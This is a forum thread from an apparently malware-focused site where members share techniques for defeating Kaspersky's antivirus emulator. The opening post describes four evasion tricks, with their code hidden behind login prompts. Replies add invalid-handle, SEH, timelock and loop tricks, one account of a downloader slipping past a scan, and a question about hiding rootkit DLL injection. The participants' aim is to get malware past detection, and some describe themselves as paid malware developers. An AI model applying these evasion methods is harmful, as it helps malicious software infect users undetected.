XR3X
Clicky

Jump to content


Photo
Snippet

Anti kaspersky emulator collection

antis

27 replies to this topic

#1 cob_258

cob_258

    Member

  • Associate
  • Reputation: 35
    Fair
  • 42 posts
  • Location@DZ

Posted 08 December 2012 - 01:41 PM

Salam, and sorry for my bad english
This is a collection of anti kaspersky emualtor bugs, most of them are fixed on 2013 version
Depending on how you implement these codes, your program may be MORE detectable because of used API (you know how to hide APIs)

the 3 first sploits found by COB, the 4th is based on grzonu api replace (SuspendThread with ResumeThread)
codes by COB


1 - VirtualAlloc sploit (fixed on 2013 version)
if emualted, ECX register keep the same value after VirtualAlloc, in normal execution it changes
* note : works also against bitdefender, not tested with last one
Code :

Please Login or Register to see this Hidden Content

or

Please Login or Register to see this Hidden Content


2 - GetSystemTime sploit (fixed on 2013 version)
Tested on XP and 7, after calling GetSystemTime ecx has the value of the milliseconds, it's not the case if emulated
Code :

Please Login or Register to see this Hidden Content


3 - zFlag after exception (fixed on 2013 version)
Code :

Please Login or Register to see this Hidden Content


4 - Api replace (still working)
Idea based on grzonu API replace sploit (SuspendThread with ResumeThread), in this code I replace the ZwTerminateProcess code with "leave;leave;ret"
* Notes : The ExitProcess api doesn't save ESI,EDI and EBX values so you have to do It
Code :

Please Login or Register to see this Hidden Content



#2 NiTrOwow

NiTrOwow

    Intermediate Member

  • Moderator
  • Reputation: 100
    Very Good
  • 294 posts

Posted 08 December 2012 - 05:02 PM

Really good thread. Thanks for posting this useful information Cob.

NiTrOwow

 

Forum Rules & Regulations


 

 

#3 cob_258

cob_258

    Member

  • Associate
  • Reputation: 35
    Fair
  • 42 posts
  • Location@DZ

Posted 08 December 2012 - 06:56 PM

You're welcome ;)

#4 Game Over

Game Over

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 6 posts
  • LocationWorld

Posted 09 December 2012 - 12:48 PM

WoOoW i Hope It Work Thenx

#5 cob_258

cob_258

    Member

  • Associate
  • Reputation: 35
    Fair
  • 42 posts
  • Location@DZ

Posted 12 December 2012 - 03:24 PM

bugfix the last code

Please Login or Register to see this Hidden Content


the use following code only if you compile with MASM32

Please Login or Register to see this Hidden Content


if you use GetProcAddress to solve ZwTerminateProcess or you compile with multimateAssembler (olly plugin), use this

Please Login or Register to see this Hidden Content



#6 htwist

htwist

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 2 posts

Posted 17 January 2013 - 02:10 PM

Another trick was/is to call native API functions that use handles with the handle parameter being invalid, the return would be 0xC0000008 on a normal machine, but in the kaspersky emulator it wouldn't be.

 

Kaspersky emulator had/has trouble emulating error codes and such according to their paper (google "kaspersky dirtbox"), it's a few years old though.



#7 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 17 January 2013 - 02:17 PM

Another trick was/is to call native API functions that use handles with the handle parameter being invalid, the return would be 0xC0000008 on a normal machine, but in the kaspersky emulator it wouldn't be.



Kaspersky emulator had/has trouble emulating error codes and such according to their paper (google "kaspersky dirtbox"), it's a few years old though.

about one year ago this trick was actual, now alone it's useless. but with some improvements of this trick, it can still work. ;) 



#8 karcrack

karcrack

    Member

  • Moderator
  • Reputation: 33
    Fair
  • 52 posts

Posted 17 January 2013 - 05:16 PM

I'm curious on how do you find those emulation errors. How are you able to know what registers are modified by the emulator?

 

Anyway, I've noticed that on different W$ versions the registers that are saved differ. By convention (Intel ABI) ESI, EDI, EBX, EBP must be saved, the others may vary.


I code for $$$

ASM, C, C++, VB6... skilled [malware] developer


#9 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 17 January 2013 - 06:45 PM

U must run api with same arguments under all ms versions and builds, checking modified registers and results



#10 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 17 January 2013 - 09:19 PM

try to goole w32.leon

u will find some info about it there...

 

p.s. also in w32.atix was used sse2 opcode as antiemulation trick =)



#11 DeadlyVermilion

DeadlyVermilion

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 1 posts

Posted 18 January 2013 - 05:53 PM

Cough cough missed some SEH tricks.



#12 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 19 January 2013 - 06:37 AM

Cough cough missed some SEH tricks

SEH tricks alone are still actually ? :)



#13 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 19 January 2013 - 09:20 AM

DeadlyVermilion

 

AV's such as Kaspersky also have runtime emulation as I've found out. Pretty easy to bypass though, unknown API results + loop = win.

KAV have self sandbox (virtual environment) were he run files.unknown API results + loop still works? ;) 



#14 hasan12345

hasan12345

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 2 posts

Posted 19 January 2013 - 10:35 AM

:)



#15 cob_258

cob_258

    Member

  • Associate
  • Reputation: 35
    Fair
  • 42 posts
  • Location@DZ

Posted 22 January 2013 - 10:31 AM

I'm curious on how do you find those emulation errors. How are you able to know what registers are modified by the emulator?


I remember how I found the VirtualAlloc trick (I was lucky) :

I tried to lose time under emulator with a VirtualAlloc loop cauz Sleep seems not working, the code was like that

Please Login or Register to see this Hidden Content

Tested this with a downloader, the scan made by KAV was long but the loader is time limited (won't take years to detect a malwere) so It gived up before reaching the downloader code and report clean

 

In normal execution the download code is executed instantly, strange

I debugged the code under olly and figured out that ecx takes a value grater than 1000 after calling VirtualAlloc so the loop ends with only one call

 

And then it's easy to conclude that ecx is saved under KAV emulator



#16 karcrack

karcrack

    Member

  • Moderator
  • Reputation: 33
    Fair
  • 52 posts

Posted 22 January 2013 - 11:03 AM

I thought there was some sweet way of getting information out... kinda OutputDebugString() haha

 

A good way to track the registers will be using some semaphores (if they're are properly emulated xD) and loops... I will be researching on this topic :P


I code for $$$

ASM, C, C++, VB6... skilled [malware] developer


#17 d3m

d3m

    Member

  • Binary Crew
  • Reputation: 9
    Neutral
  • 56 posts

Posted 22 January 2013 - 12:09 PM

invoke VirtualAlloc,0,5000,MEM_COMMIT,40h

playing with memory not very stable bro...

 

loops alone can be not fully emulated (something like ecx will be emulated dynamicly without running all loop), u must count something into and then cmp result.. to avoid jmp from ur loop.



#18 htwist

htwist

    Newbie

  • Members
  • Reputation: 0
    Neutral
  • 2 posts

Posted 23 January 2013 - 06:42 PM

There's also more ways to take advantage of the 4th trick, some used publically and has been documented by AV people in analysis papers. :)



#19 steve10120

steve10120

    Newbie

  • Notorious
  • Reputation: 9
    Neutral
  • 7 posts

Posted 23 January 2013 - 07:28 PM

Never had a problem with emulators, especially Kaspersky's. SEH, timelocks or general stack manipulation gets rid of 99% of them.



#20 Ravage

Ravage

    Intermediate Member

  • Administrators
  • Reputation: 106
    Very Good
  • 222 posts

Posted 25 January 2013 - 03:13 AM

Never had a problem with emulators, especially Kaspersky's. SEH, timelocks or general stack manipulation gets rid of 99% of them.

Will that get rid of KAV tags on dll injection as well for example? For example, a ring3 rootkit that need to inject into all running processes, etc.

Can this avoid KAV usual tags to the mentioned injections?

I'm not a detection expert. Reason why I am asking.







Also tagged with one or more of these keywords: snippet, antis

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users